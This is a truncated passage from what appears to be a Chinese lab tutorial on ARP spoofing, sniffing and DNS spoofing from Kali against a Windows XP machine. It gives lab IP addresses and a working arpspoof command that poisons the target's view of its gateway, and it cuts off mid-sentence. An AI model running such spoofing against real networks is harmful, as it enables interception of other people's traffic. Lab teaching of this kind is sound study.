局域网下ARP欺骗、嗅探,以及DNS欺骗

  准备:kali、xp kali ip:192.168.14.157 目标ip:192.168.14.158 目标网关:192.168.14.2   ARP欺骗: arpspoof -t 目标ip -r 目标网关 命令:arpspoof  -i  eth0 -t 192.168.14.158 -r 192.168.14.2    我们可以看到xp认为网关的MAC地址和KAli是一样的 显示我们欺
相关文章
相关标签/搜索